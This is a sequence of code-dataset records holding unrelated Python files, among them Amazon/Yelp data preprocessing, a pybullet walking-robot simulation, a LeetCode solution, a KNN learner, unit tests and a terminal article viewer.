set_meta.to_csv('data/yelp/meta.csv', sep='\\t', encoding='utf-8', index=False)\n\n\ndef _amazon_table_preprocessing():\n # Load meta\n json_list = []\n len_list = []\n print('--load meta')\n for category in tqdm(AMAZON_CATEGORIES):\n f = open('data/amazon/raw_others/meta_%s.json' % category, 'r')\n lines = f.readlines()\n len_list.append(len(lines))\n for line in lines:\n json_list.append(eval(line))\n\n # Set max categories\n categories_threshold = int(np.percentile(pd.Series([len(x['categories']) for x in json_list]), 90))\n\n # Select essential meta\n train_group_ids = [x.split('/')[-1][:-4] for x in glob.glob('data/amazon/5.text/train/*.csv')]\n val_group_ids = [x.split('/')[-1][:-4] for x in glob.glob('data/amazon/5.text/val/*.csv')]\n test_group_ids = list(pd.read_csv('data/amazon/test/all.csv', encoding='utf-8', sep='\\t').prod_id)\n\n asin = pd.Series([x['asin'] for x in json_list])\n asin = asin[asin.drop_duplicates().index]\n asin = asin.reset_index()\n asin.index = asin[0]\n asin = 
asin.loc[train_group_ids + val_group_ids + test_group_ids]\n\n net_index_list = list(asin['index'])\n net_json_list = [json_list[i] for i in net_index_list]\n\n # Process meta\n print('--process meta')\n for x in tqdm(net_json_list):\n # asin\n x['group_id'] = x.pop('asin')\n # categories\n x['category'] = \"||\".join([\"|\".join(y) for y in x.pop('categories')[:categories_threshold]])\n\n # brand\n x = _make_field(x, 'brand', 'brand', '', lambda y : html.unescape(y))\n # description\n x = _make_field(x, 'description', 'description', '', lambda y : _clean_html(y))\n # imUrl\n x = _make_field(x, 'imUrl', 'imUrl', '', lambda y : y if y.startswith('http://ecx') else '')\n # price\n x = _make_field(x, 'price', 'price', _to_binary(0.0, 11), lambda y : _to_binary(float(y), 11))\n # title\n x = _make_field(x, 'title', 'name', '', lambda y : html.unescape(y))\n\n # related & salesRank\n if 'related' in x:\n x.pop('related')\n if 'salesRank' in x:\n x.pop('salesRank')\n\n # ratings\n df = None\n for category in AMAZON_CATEGORIES:\n try:\n with open('data/amazon/1.prep/%s/%s.csv' % (category, x['group_id']), \n encoding='utf-8', mode='r') as f:\n lines = f.readlines()[1:]\n df = pd.DataFrame([x.strip().split('\\t') for x in lines], \n columns=['group_id', 'review_text', 'rating', 'category'])\n break\n except FileNotFoundError:\n df = None\n\n if df is not None:\n x['ratings'] = _to_binary(df.rating.apply(float).mean(), 4)\n else:\n x['ratings'] = ''\n\n # Save meta\n set_meta = pd.DataFrame(net_json_list)[['group_id', 'price', 'ratings', 'brand', 'name', 'category', 'description']]\n set_meta.to_csv('data/amazon/meta.csv', sep='\\t', encoding='utf-8', index=False)\n\ndef preprocessing(dataset):\n print('Table modality preprocessing: %s' % dataset)\n if dataset == 'yelp':\n _yelp_table_preprocessing()\n elif dataset == 'amazon':\n _amazon_table_preprocessing()\n","sub_path":"multimodal_preprocessing/table_modality_preprocessing.py","file_name":"table_modality_preprocessing.py","file_ext":"py","file_size_in_byte":13826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
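Both the Yelp stars and the Amazon price/ratings fields are packed by `_to_binary`: the integer part is binary-encoded, the (optionally half-rounded) fraction contributes one trailing bit, and the result is left-padded with zeros to `max_len`. A self-contained worked check, with the function copied from the module above:

```python
import math

def _to_binary(x, max_len, rounding=True):  # copied verbatim from the module above
    if rounding:
        x = round(x * 2.0) / 2.0
    p_float, p_integer = math.modf(x)
    b_integer = bin(int(p_integer))[2:]
    b_float = bin(math.ceil(p_float))[2:]
    binary = b_integer + b_float
    return '0' * (max_len - len(binary)) + binary

assert _to_binary(3.5, 4) == '0111'     # '11' (3) + '1' (half star), padded
assert _to_binary(4.0, 4) == '1000'     # '100' (4) + '0' (no fraction)
assert _to_binary(0.0, 11) == '0' * 11  # the null-price sentinel used above
```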
+{"seq_id":"224913631","text":"#passive dynamic walking\n\nimport pybullet as p\nimport time\nimport pybullet_data\nimport math\n\nPI = math.pi\n\ndef getcontact(robotid, planeid, linkindex):\n #get contact infomation\n coninfo = p.getContactPoints(robotid, planeid, linkindex)\n #print('contact infomation')\n #print(coninfo)\n\n coninfolen = len(coninfo)\n #contact -> 1, no contact -> 0\n conflag = 0\n if coninfolen != 0:\n if coninfo[0][0] == 0:\n #print('contact!')\n conflag = 1\n #else:\n #print('no contct..')\n\n return conflag\n\nphysicsClient = p.connect(p.GUI)#or p.DIRECT for non-graphical version \np.setAdditionalSearchPath(pybullet_data.getDataPath()) #optionally \n#set Gravity\np.setGravity(0,0,-9.8)\n#load plane URDF\nplaneId = p.loadURDF(\"plane.urdf\")\n#initial position of a robot\ncubeStartPos = [0,0,0.9]\n#initial orientation of a robot\ncubeStartOrientation = p.getQuaternionFromEuler([0,0,0])\n#load a robot\nrobotId = p.loadURDF(\"urdf/test_walker1-2.urdf\", cubeStartPos, cubeStartOrientation)\n\n#CONTROL MODE\npmode = p.POSITION_CONTROL\nvmode = p.VELOCITY_CONTROL\ntmode = p.TORQUE_CONTROL\n\n\nsimpara = p.getPhysicsEngineParameters(physicsClient)\nprint('simulation parameters')\nprint(simpara)\n\n#joint indices\njointIndex = {\"outer_hip_joint1\":0, \"outer_knee_joint1\":1, \"inner_hip_joint1\":2, \"inner_knee_joint1\":3, \"inner_hip_joint2\":4, \"inner_knee_joint2\":5, \"outer_hip_joint2\":6, \"outer_knee_joint2\":7}\n\n#link indices\nlinkIndex = {\"outer_thigh1\":0, \"outer_shin1\":1, \"inner_thigh1\":2, \"inner_shin1\":3, \"inner_thigh2\":4, \"inner_shin2\":5, \"outer_thigh2\":6, \"outer_shin2\":7}\n\n#joint indices list\nouter_hip_joints = [jointIndex[\"outer_hip_joint1\"], jointIndex[\"outer_hip_joint2\"]]\nouter_knee_joints = [jointIndex[\"outer_knee_joint1\"], jointIndex[\"outer_knee_joint2\"]]\ninner_hip_joints = [jointIndex[\"inner_hip_joint1\"], jointIndex[\"inner_hip_joint2\"]]\ninner_knee_joints = [jointIndex[\"inner_knee_joint1\"], jointIndex[\"inner_knee_joint2\"]]\n\n#Initial Position of hips\n#hip joints move using setJointMotorControl2\np.setJointMotorControl2(robotId, jointIndex[\"outer_hip_joint1\"], controlMode=pmode, targetPosition=PI / 9)\np.setJointMotorControl2(robotId, jointIndex[\"outer_hip_joint2\"], controlMode=pmode, targetPosition=PI / 9)\np.setJointMotorControl2(robotId, jointIndex[\"inner_hip_joint1\"], controlMode=pmode, targetPosition=-1 * PI / 9)\np.setJointMotorControl2(robotId, jointIndex[\"inner_hip_joint2\"], controlMode=pmode, targetPosition=-1 * PI / 9)\n \n#Initial Position of knees\n#knee joints move using setJointMotorControlArray\n#p.setJointMotorControlArray(robotId, outer_knee_joints, controlMode=pmode, targetPositions=[PI / 7, PI / 7]) \n#p.setJointMotorControlArray(robotId, inner_knee_joints, controlMode=pmode, targetPositions=[PI / 3, PI / 3])\np.setJointMotorControlArray(robotId, outer_knee_joints, controlMode=pmode, targetPositions=[0, 0]) \np.setJointMotorControlArray(robotId, inner_knee_joints, controlMode=pmode, targetPositions=[PI / 36, PI / 36])\n\n#phase1 -> outer legs are swinging\n#phase2 -> inner legs are swinging\nphase = 1\n\ncount = 0\n#inner_hipangle = -1 * PI / 12\n#inner_kneeangle = 0\n#outer_hipangle = PI * 5 / 36\n#outer_kneeangle = 0\n\nic_hip_angle = PI / 9\nic_knee_angle = PI / 36\nlr_knee_angle = PI / 12\ntst_hip_angle = -1 * PI / 9\ntst_knee_angle = PI / 36\nknee_angle_zero = 0 \n\nswing_hipangle = ic_hip_angle\nswing_kneeangle = ic_knee_angle\nsupport_hipangle = tst_hip_angle\nsupport_kneeangle = 
tst_knee_angle\n\nsleeptime = 500\n#swhiptime = 560\nswhiptime = 560\n#swkneetime = 570\nswkneetime = 590\n#suhiptime = 515\nsuhiptime = 515\nsukneetime = 540\n\nswkneemovetime = (swkneetime - sleeptime) * 0.8\nsukneemovetime = ((sukneetime - sleeptime) * 0.8) / 2 #this time is CW time and CCW time -> /2.0\n\nsw_zero_to_five_time = (swkneetime - (sleeptime + swkneemovetime)) * 0.5\nsu_zero_to_five_time = (sukneetime - (sleeptime + sukneemovetime + sukneemovetime)) * 0.2\nsu_mid_time = (sukneetime - su_zero_to_five_time) - (sleeptime + sukneemovetime * 2)\n\npa_or_con_flag = 1\n\n#simulation start -> simflag = 1\nsimflag = 0\n\nwhile True:\n count = count + 1\n \n #get contact infomation\n conflag_outer_shin1 = getcontact(robotId, planeId, linkIndex[\"outer_shin1\"])\n conflag_outer_shin2 = getcontact(robotId, planeId, linkIndex[\"outer_shin2\"])\n conflag_inner_shin1 = getcontact(robotId, planeId, linkIndex[\"inner_shin1\"])\n conflag_inner_shin2 = getcontact(robotId, planeId, linkIndex[\"inner_shin2\"])\n \n #attach the bottun to feet\n #if conflag_outer_shin1 == 1:\n #print(\"outer shin1 contact!\")\n #if conflag_outer_shin2 == 1:\n #print(\"outer shin2 contact!\")\n #else:\n #print(\"outer shin2 no contact\")\n #if conflag_inner_shin1 == 1:\n #print(\"inner shin1 contact!\")\n #else:\n #print(\"inner shin1 no contact\")\n #if conflag_inner_shin2 == 1:\n #print(\"inner shin2 contact!\")\n #else:\n #print(\"inner shin2 no contact\")\n \n #check! if swing leg's feet contact ground, it would say OUT!\n #if (simflag == 1) and ((phase == 1 and conflag_outer_shin1 == 1) or (phase == 1 and conflag_outer_shin2 == 1)):\n #print(\"OUT!!\")\n\n if conflag_outer_shin1 == 1 and conflag_outer_shin2 == 1:\n outer_conflag = 1\n else:\n outer_conflag = 0\n\n if conflag_inner_shin1 == 1 and conflag_inner_shin2 == 1:\n inner_conflag = 1\n else:\n inner_conflag = 0\n\n #move angle / max count -> changing by average speed\n #swing legs\n #hip tst_hip_angle -> ic_hip_angle\n if count >= sleeptime and count <= swhiptime:\n swing_hipangle = swing_hipangle - PI * 2 / 9 / (swhiptime - sleeptime)\n #knee\n if count >= sleeptime and count <= swkneetime:\n if count <= sleeptime + 2:\n pa_or_con_flag = 1\n swing_kneeangle = ic_knee_angle\n #free joint\n elif count > sleeptime + 2 and count <= sleeptime + swkneemovetime:\n #swing_kneeangle = swing_kneeangle + PI / 3 / swkneemovetime\n pa_or_con_flag = 0\n print(count)\n # -> 0\n elif count > sleeptime + swkneemovetime and count <= swkneetime - sw_zero_to_five_time:\n pa_or_con_flag = 1\n swing_kneeangle = knee_angle_zero\n #0 -> ic_knee_angle\n else:\n pa_or_con_flag = 1\n swing_kneeangle = swing_kneeangle + ic_knee_angle / sw_zero_to_five_time\n \n #support legs\n #hip ic_hip_angle -> tst_hip_angle\n if count >= sleeptime and count <= suhiptime:\n support_hipangle = support_hipangle + PI * 2 / 9 / (suhiptime - sleeptime)\n #knee\n if count >= sleeptime and count <= sukneetime:\n #ic_knee_angle -> lr_knee_angle\n if count <= sleeptime + sukneemovetime:\n support_kneeangle = support_kneeangle + (lr_knee_angle - ic_knee_angle) / sukneemovetime\n #reverse\n elif count > sleeptime + sukneemovetime and count <= sleeptime + sukneemovetime * 2:\n support_kneeangle = support_kneeangle - (lr_knee_angle - ic_knee_angle) / sukneemovetime\n #ic_knee_angle -> 0\n elif count > sleeptime + sukneemovetime * 2 and count <= sukneetime - su_zero_to_five_time:\n support_kneeangle = support_kneeangle - (ic_knee_angle / su_mid_time)\n #reverse\n else:\n support_kneeangle = 
support_kneeangle + (ic_knee_angle / su_zero_to_five_time)\n\n \n #if count == 1010:\n #if (count >= sleeptime + 10) and ((phase == 1 and outer_conflag == 1 and inner_conflag == 0) or (phase == 2 and outer_conflag == 0 and inner_conflag == 1)):\n if (count >= sleeptime + 100) and ((phase == 1 and outer_conflag == 1) or (phase == 2 and inner_conflag == 1)): \n simflag = 1\n #print(\"phase change!!\")\n \n count = sleeptime\n #reset angle \n \n #swing_hipangle = PI * 5 / 36\n #swing_kneeangle = 0\n #support_hipangle = -1 * PI / 12\n #support_kneeangle = 0\n swing_hipangle = ic_hip_angle\n swing_kneeangle = ic_knee_angle\n support_hipangle = tst_hip_angle\n support_kneeangle = tst_knee_angle\n\n\n #change support legs\n if phase == 1:\n phase = 2\n elif phase == 2:\n phase = 1\n \n #outer legs: swing leg\n #inner legs: support leg\n if phase == 1:\n outer_hipangle = swing_hipangle\n outer_kneeangle = swing_kneeangle\n inner_hipangle = support_hipangle\n inner_kneeangle = support_kneeangle\n #Inner Legs\n p.setJointMotorControlArray(robotId, inner_hip_joints, controlMode=pmode, targetPositions=[inner_hipangle, inner_hipangle]) \n p.setJointMotorControlArray(robotId, inner_knee_joints, controlMode=pmode, targetPositions=[inner_kneeangle, inner_kneeangle]) \n \n #Outer Legs\n p.setJointMotorControlArray(robotId, outer_hip_joints, controlMode=pmode, targetPositions=[outer_hipangle, outer_hipangle]) \n \n #passive mode\n if pa_or_con_flag == 0:\n #torque 0 knee\n p.setJointMotorControlArray(robotId, outer_knee_joints, controlMode=vmode, forces=[0, 0]) \n #position control mode\n else:\n p.setJointMotorControlArray(robotId, outer_knee_joints, controlMode=pmode, targetPositions=[outer_kneeangle, outer_kneeangle]) \n\n #outer legs: support leg\n #inner legs: swing leg\n elif phase == 2: \n outer_hipangle = support_hipangle\n outer_kneeangle = support_kneeangle\n inner_hipangle = swing_hipangle\n inner_kneeangle = swing_kneeangle\n #Outer Legs\n p.setJointMotorControlArray(robotId, outer_hip_joints, controlMode=pmode, targetPositions=[outer_hipangle, outer_hipangle]) \n p.setJointMotorControlArray(robotId, outer_knee_joints, controlMode=pmode, targetPositions=[outer_kneeangle, outer_kneeangle]) \n \n #Inner Legs\n p.setJointMotorControlArray(robotId, inner_hip_joints, controlMode=pmode, targetPositions=[inner_hipangle, inner_hipangle]) \n \n #passive mode\n if pa_or_con_flag == 0:\n #torque 0 knee\n p.setJointMotorControlArray(robotId, inner_knee_joints, controlMode=vmode, forces=[0, 0]) \n #position control mode\n else:\n p.setJointMotorControlArray(robotId, inner_knee_joints, controlMode=pmode, targetPositions=[inner_kneeangle, inner_kneeangle]) \n\n\n #get Base position\n basePos, baseQua = p.getBasePositionAndOrientation(robotId)\n #set camera position \n p.resetDebugVisualizerCamera(2.0, 20, -30, basePos)\n \n #Get joints num\n #jnum = p.getNumJoints(robotId)\n #print('joints num = {}'.format(jnum))\n\n #Get joint information\n #jointinfo = p.getJointInfo(robotId, jindex)\n #print(jointinfo[1])\n \n #passive or control change the rule\n\n #Inner Legs\n #p.setJointMotorControlArray(robotId, inner_hip_joints, controlMode=pmode, targetPositions=[inner_hipangle, inner_hipangle]) \n #p.setJointMotorControlArray(robotId, inner_knee_joints, controlMode=pmode, targetPositions=[inner_kneeangle, inner_kneeangle]) \n \n #Outer Legs\n #p.setJointMotorControlArray(robotId, outer_hip_joints, controlMode=pmode, targetPositions=[outer_hipangle, outer_hipangle]) \n #p.setJointMotorControlArray(robotId, outer_knee_joints, controlMode=pmode, targetPositions=[outer_kneeangle, outer_kneeangle]) \n #torque 0 knee\n #p.setJointMotorControlArray(robotId, outer_knee_joints, controlMode=vmode, forces=[0, 0]) \n \n\n \n\n #step forward in the simulation\n p.stepSimulation()\n #wait a bit to smooth the simulation\n time.sleep(1./300.)\n\np.disconnect()\n\n","sub_path":"test_walker1/passive_dynamic-simulator3.py","file_name":"passive_dynamic-simulator3.py","file_ext":"py","file_size_in_byte":11610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"273702411","text":"class Solution:\n def latestDayToCross(self, row: int, col: int, cells) -> int:\n n = row * col\n directs = [[-1, 0], [1, 0], [0, -1], [0, 1]]\n\n def valid(x):\n a = [[0 for j in range(col)] for i in range(row)]\n for i in range(x):\n c1, c2 = cells[i][0] - 1, cells[i][1] - 1\n a[c1][c2] = 1\n q = [(0, i) for i in range(col) if a[0][i] == 0]\n visited = set(q)\n while q:\n newQ = []\n for x, y in q:\n if x == row - 1:\n return True\n for dx, dy in directs:\n i, j = x + dx, y + dy\n if 0 <= i < row and 0 <= j < col and a[i][j] == 0 and (i, j) not in visited:\n newQ.append((i, j))\n visited.add((i, j))\n q = newQ\n return False\n\n l, r = 1, n - 1\n while l < r:\n m = (l + r + 1) // 2\n if valid(m):\n l = m\n else:\n r = m - 1\n return l\n\n\ns = Solution()\nprint(s.latestDayToCross(6,\n 2,\n [[4, 2], [6, 2], [2, 1], [4, 1], [6, 1], [3, 1], [2, 2], [3, 2], [1, 1], [5, 1], [5, 2],\n [1, 2]]))\nprint(s.latestDayToCross(3, 3, [[1, 2], [2, 1], [3, 3], [2, 2], [1, 1], [1, 3], [2, 3], [3, 2], [3, 1]]))\nprint(s.latestDayToCross(2, 2, [[1, 1], [2, 1], [1, 2], [2, 2]]))\n","sub_path":"leetcode/2021/contest/weekly-254/Contest4.py","file_name":"Contest4.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"592386552","text":"import math\n\ninputFile = open(\"input_day1.txt\", \"r\")\n\n\ndef calc_fuel_needed(module_mass):\n fuel_needed = math.floor(int(module_mass)/3)-2\n return fuel_needed\n\n\ntotal_fuel = 0\nfor line in inputFile:\n fuel_per_module = calc_fuel_needed(line)\n total_fuel += fuel_per_module\n\nprint(\"The total fuel count is: \" + str(total_fuel))\n","sub_path":"day01/fuelCounter.py","file_name":"fuelCounter.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"109752722","text":"\"\"\"\nThis doesn't really belong here, but you can't create\ncommands at the main config package :(.\n\"\"\"\nimport sys\nfrom django.core.management.base import BaseCommand\n\nfrom honcho.manager import Manager\n\n\nclass Command(BaseCommand):\n help = 'Runs the devserver with all dependencies'\n\n def handle(self, *args, **options):\n m = Manager()\n m.add_process('web', './manage.py runserver')\n m.add_process('celery', 'celery -A website worker --beat -l info '\n '--scheduler django')\n m.loop()\n\n sys.exit(m.returncode)\n","sub_path":"core/management/commands/devserver.py","file_name":"devserver.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"87316708","text":"import pytest\n\nfrom mocket.plugins.httpretty import HTTPretty\nfrom mocket import Mocketizer\n\nfrom genericclient_aiohttp import GenericClient\nfrom genericclient_aiohttp.pagination import link_header\n\n\n@pytest.mark.asyncio\nasync def test_paginate(api_url, register_json):\n generic_client = GenericClient(url=api_url, autopaginate=link_header)\n\n with Mocketizer():\n register_json(\n HTTPretty.GET, '/users', json=[{'id': 1}],\n link='<{api_url}/users?page=2>; rel=next'.format(api_url=api_url)\n )\n register_json(\n HTTPretty.GET, '/users?page=2', json=[{'id': 2}],\n link='<{api_url}/users>; rel=previous, <{api_url}/users?page=3>; rel=next'.format(api_url=api_url)\n )\n register_json(\n HTTPretty.GET, '/users?page=3', json=[{'id': 3}],\n link='<{api_url}/users?page=2>; rel=previous'.format(api_url=api_url)\n )\n users = await generic_client.users.all()\n\n assert len(users) == 3\n assert users[0].id == 1\n assert users[1].id == 2\n assert users[2].id == 3\n","sub_path":"tests/test_paginate.py","file_name":"test_paginate.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"16075118","text":"import unittest,os\nfrom question1 import *\n\nclass DataCreatorTests(unittest.TestCase):\n BASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\n def testread_over_lap_check1(self):\n in1=(2,5)\n in2=(3,9)\n result = over_lap_check(in1, in2)\n expect_result=True\n self.assertEqual(expect_result,result)\n\n def testread_over_lap_check2(self):\n in1 = (2, 5)\n in2 = (-3, 9)\n result = over_lap_check(in1, in2)\n expect_result = True\n self.assertEqual(expect_result, result)\n\n def testread_over_lap_check3(self):\n in1 = (2, 5)\n in2 = (6, 9)\n result = over_lap_check(in1, in2)\n expect_result = False\n self.assertEqual(expect_result, result)\n\n def testread_over_lap_check4(self):\n in1 = (-7, -1)\n in2 = (-3, 9)\n result = over_lap_check(in1, in2)\n expect_result = True\n self.assertEqual(expect_result, result)\n\n def testread_over_lap_check5(self):\n in1 = (-7, -1)\n in2 = (-13, -9)\n result = over_lap_check(in1, in2)\n expect_result = False\n self.assertEqual(expect_result, result)\n\n def test_read_over_lap_check6(self):\n in1 = (2, 5)\n in2 = ('a', 9)\n result = over_lap_check(in1, in2)\n self.assertIsNone( result)\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"ormunco/test/test_question1.py","file_name":"test_question1.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"119423282","text":"import math\nimport torch\nimport gpytorch\nimport numpy as np\n\nfrom sklearn import svm\nimport gp_core\n\n\n'''\ndef func1(x):\n return np.sin(x * (2 * math.pi))*np.sin(x * (2 * math.pi))\n\ndef func2(x):\n return np.sin(x * (10 * math.pi))*np.sin(x * (10 * math.pi))\n'''\n\ndef func1(x):\n return x\n\ndef func2(x):\n return torch.ones(x.shape)\n\n\ndef train(train_x, train_y, expert_num=2, linear_model_basis=[func1,func2]):\n\n ratio=0.5\n datanum=train_x.shape[0]\n data=torch.cat((train_x, train_y.reshape(datanum,1)),dim=1)\n\n svm_input_data = np.array([[-1.],[3.]])\n svm_output_label=np.array([0,1])\n for i in range(0,20):\n\n # learn SVM\n clf = svm.SVC(C=1.)\n clf.fit(svm_input_data, svm_output_label)\n\n for k in range(20):# 1, 20\n print(k)\n # train/test data split\n data=data[np.random.permutation(np.arange(datanum)),:]\n split_n = int(math.floor(ratio*datanum))\n train_xy = data[:split_n,:]\n test_x = data[split_n:,:-1]\n test_y = data[split_n:,-1]\n\n\n # sort train data using SVM\n train_label = clf.predict(train_xy[:,:-1].numpy())\n\n\n # learn local SPGP experts\n expert_list=[]\n for j in range(expert_num):\n temp_train_x = train_xy[train_label==j, :-1]\n temp_train_y = train_xy[train_label==j,-1]\n temp_expert, temp_loss = gp_core.train_expert(temp_train_x, temp_train_y, rbf=True, linear_model=[func1,func2])\n expert_list.append(temp_expert)\n\n\n # labelling test data based on predictive likelihood.\n for j in range(expert_num):\n means, variances = expert_list[j].predict(test_x)\n temp_score = torch.log(2.*math.pi*variances) + (means-test_y)*(means-test_y)/variances\n if 0==j:\n score = temp_score\n else:\n score = torch.cat((score,temp_score),dim=0)\n value, index = score.min(dim=0)\n\n if 0==k:\n svm_input_data =test_x.numpy()\n svm_output_label=index.numpy()\n else:\n svm_input_data = np.concatenate([svm_input_data, test_x.numpy()], 0)\n svm_output_label = np.concatenate([svm_output_label, index.numpy()], 0)\n\n\n # compute total loss\n expert_list=[]\n loss_list=[]\n label = clf.predict(data[:,:-1].numpy())\n for j in range(expert_num):\n temp_expert, temp_loss = gp_core.train_expert(data[label==j,:-1], data[label==j,-1], rbf=True, linear_model=[func1,func2])\n expert_list.append(temp_expert)\n loss_list.append(temp_loss)\n print(i,\"loss =\",sum(loss_list))\n\n\n # draw and save figure\n #'''\n if 0==(i%1):\n from matplotlib import pyplot as plt\n plt.plot(data[:,:-1].numpy(), data[:,-1].numpy(), 'k*')\n label = clf.predict(data[:,:-1].numpy())\n for j in range(expert_num):\n means, variances = expert_list[j].predict(data[label==j,:-1])\n if j==0:\n plt.plot(data[label==j,:-1].numpy(), means.numpy().T, 'ro')\n else:\n plt.plot(data[label==j,:-1].numpy(), means.numpy().T, 'co')\n \n plt.title(\"iteration \"+str(i))\n plt.savefig(\"fig_iter\"+str(i)+\".png\", dpi=500)\n plt.close()\n \n #'''\n","sub_path":"develop6/local_spgp.py","file_name":"local_spgp.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"578070199","text":"import datetime as dt\nfrom pylab import *\nimport numpy as np\nimport sys\nimport pandas\nimport csv\n\n\nclass KNNLearner:\n\n def __init__(self, K):\n self.k = K\n self.x_train = None\n self.y_train = None\n \n\n def addEvidence(self, X_train, Y_train):\n self.x_train = X_train\n self.y_train = Y_train\n \n def query_xvector(self, input_X):\n train_rows = int(self.x_train.shape[0])\n test_rows = int(input_X.shape[0])\n vector_length = int(input_X.shape[1])\n \n e_dist = np.zeros((train_rows,2))\n result = np.zeros((test_rows,1))\n rng = np.arange(test_rows)\n \n for row_index in rng:\n e_dist[:,0] = self.y_train[:,0]\n e_dist[:,1] = np.sum((self.x_train - input_X[row_index,:])**2,axis=1)\n \n data = e_dist\n indices = data[:,-1].argsort()\n selection = indices[:self.k]\n #print selection\n temp = 0\n for sel_index in selection:\n temp = temp+data[sel_index,0]\n #print temp\n result[row_index] = temp / self.k\n return result\n\n def query(self, X_test):\n train_rows = int(self.x_train.shape[0])\n #rng2 = np.arange(train_rows)\n test_rows = int(X_test.shape[0])\n dist = np.zeros((train_rows,2))\n result = np.zeros((test_rows,1))\n rng = np.arange(test_rows)\n \n for row_index in rng:\n dist[:,0] = self.y_train[:,0]\n dist[:,1] = np.sum((self.x_train - X_test[row_index,:])**2,axis=1)\n \n #for row_index2 in rng2:\n # dist[row_index2,0] = self.y_train[row_index2]\n # dist[row_index2,1] = np.linalg.norm(X_test[row_index,:]-self.x_train[row_index2,:])\n data = dist\n indices = data[:,-1].argsort()\n selection = indices[:self.k]\n #print selection\n temp = 0\n for sel_index in selection:\n temp = temp+data[sel_index,0]\n #print temp\n result[row_index] = temp / self.k\n return result","sub_path":"other/example_code/KNNLearner.py","file_name":"KNNLearner.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"497265200","text":"from PyQt5 import QtWidgets\nfrom layouts import Ui_Form\nimport sys\nif __name__==\"__main__\":\n app=QtWidgets.QApplication(sys.argv)\n ui=Ui_Form()\n widget=QtWidgets.QWidget()\n ui.setupUi(widget)\n widget.show()\n sys.exit(app.exec_())","sub_path":"gui/main_layouts.py","file_name":"main_layouts.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"640634286","text":"# -*- coding: utf8 -*-\nfrom os import listdir, system\nfrom os.path import isfile, basename, splitext\nfrom getch import getch\nimport re\nimport sys\nimport argparse\n\narg_parser = argparse.ArgumentParser(description='download_folder')\narg_parser.add_argument('-b', help='the board folder with raw_data articles')\nargs = arg_parser.parse_args()\n\ndef show_article_list(data, start, end, cursor):\n system('clear')\n for i in xrange(start, end):\n if i - start == cursor:\n sys.stdout.write('> ')\n else:\n sys.stdout.write(' ')\n sys.stdout.write(str(i) + '\\t' + data[i] + '\\n')\n sys.stdout.write(str(end - 1) + ' / ' + str(len(data) - 1) + '\\n')\n\ndef show_article(data, index):\n system('clear')\n file_name = args.b + str(index) + ' ' + data[index] + '.txt'\n f = open(file_name, 'r')\n article = f.read()\n\n # identify pages\n pages = [0]\n for i in re.finditer(\"<>\", article):\n pages.append(i.start())\n\n curr_page = 0\n while True:\n page_start = pages[curr_page]\n if curr_page == len(pages) - 1:\n page_end = -1\n else:\n page_end = pages[curr_page + 1]\n sys.stdout.write(article[page_start:page_end] + '\\n')\n sys.stdout.flush()\n cmd = get_user_command(\"(n)ext page, (p)revious page, b(a)ck: \")\n if cmd == 'n':\n if curr_page != len(pages): # not end of article\n curr_page += 1\n elif cmd == 'p':\n if curr_page > 0:\n curr_page -= 1\n elif cmd == 'a':\n return\n\ndef get_user_command(msg):\n sys.stdout.write(msg)\n sys.stdout.flush()\n cmd = getch()\n sys.stdout.write('\\n')\n return cmd\n\n# get articles\narticles = [f for f in listdir(args.b) if f.find('.txt') != -1]\n\n# build article list\nnum_article = len(articles)\narticle_list = []\nfor i in xrange(num_article + 1):\n article_list.append('')\n\nfor a in articles:\n idx_and_title = re.search(\"(\\d+) (.*)\", splitext(a)[0])\n if idx_and_title == None:\n continue\n idx = idx_and_title.group(1)\n title = idx_and_title.group(2)\n article_list[int(idx)] = title\n\n# display\ncursor = 0\ncurr_start = 1\narticle_per_page = 10\nlast_cmd = ''\nwhile True:\n curr_end = min(curr_start + article_per_page, num_article)\n show_article_list(article_list, curr_start, curr_end, cursor)\n cmd = get_user_command('(n)ext page, (p)revious page (q)uit: ')\n\n # stage 1: quit cheking\n if cmd == 'q':\n break\n\n # stage 2: open article\n if cmd == 'd':\n show_article(article_list, curr_start + cursor)\n\n # stage 2: move cursor\n if cmd == 'w':\n if cursor > 0:\n cursor -= 1\n else:\n cmd = 'p'\n cursor = article_per_page - 1\n elif cmd == 's':\n if cursor < article_per_page - 1:\n cursor += 1\n else:\n cmd = 'n'\n cursor = 0\n\n # stage 3: change page\n if cmd == 'n' and curr_end != num_article:\n curr_start += article_per_page\n elif cmd == 'p' and curr_start > 0:\n curr_start = max(curr_start - article_per_page, 1)\n\n","sub_path":"viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
